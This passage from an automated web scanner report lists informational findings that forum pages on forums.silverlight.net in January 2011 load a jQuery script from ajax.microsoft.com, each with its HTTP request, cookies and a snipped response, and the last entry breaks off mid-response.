Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/56.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 61545
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Jobs :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.87. http://forums.silverlight.net/forums/59.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/59.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/59.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73671
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:30 GMT; expires=Sun, 29-Jan-2012 23:17:30 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:30 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.88. http://forums.silverlight.net/forums/63.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/63.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/63.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71202
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:04 GMT; expires=Sun, 29-Jan-2012 23:18:04 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.89. http://forums.silverlight.net/forums/64.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/64.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/64.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71929
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:48 GMT; expires=Sun, 29-Jan-2012 23:17:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   MVVM /
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.90. http://forums.silverlight.net/forums/65.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/65.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/65.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 64898
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:42 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Manage
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.91. http://forums.silverlight.net/forums/66.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/66.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/66.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 65198
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:05 GMT; expires=Sun, 29-Jan-2012 23:18:05 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.92. http://forums.silverlight.net/forums/67.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/67.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/67.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 65193
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:43 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Perfor
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.93. http://forums.silverlight.net/forums/68.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/68.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/68.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76391
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:58 GMT; expires=Sun, 29-Jan-2012 23:17:58 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   PivotV
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.94. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/TopicsNotAnswered.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73694
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:39 GMT; expires=Sun, 29-Jan-2012 23:20:39 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Thread
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.95. http://forums.silverlight.net/forums/p/217026/518297.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217026/518297.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217026/518297.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 107413
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:38 GMT; expires=Sun, 29-Jan-2012 23:20:38 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Elemen
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.96. http://forums.silverlight.net/forums/p/217498/518305.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217498/518305.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217498/518305.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 58467
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:55 GMT; expires=Sun, 29-Jan-2012 23:19:55 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   MVVM a
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.97. http://forums.silverlight.net/forums/p/217562/518302.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217562/518302.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217562/518302.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31591
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:16 GMT; expires=Sun, 29-Jan-2012 23:20:16 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:16 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Self-R
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.98. http://forums.silverlight.net/forums/p/217667/518301.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217667/518301.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217667/518301.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31838
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:17 GMT; expires=Sun, 29-Jan-2012 23:20:17 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Datagr
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.99. http://forums.silverlight.net/forums/p/217709/518306.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217709/518306.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217709/518306.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
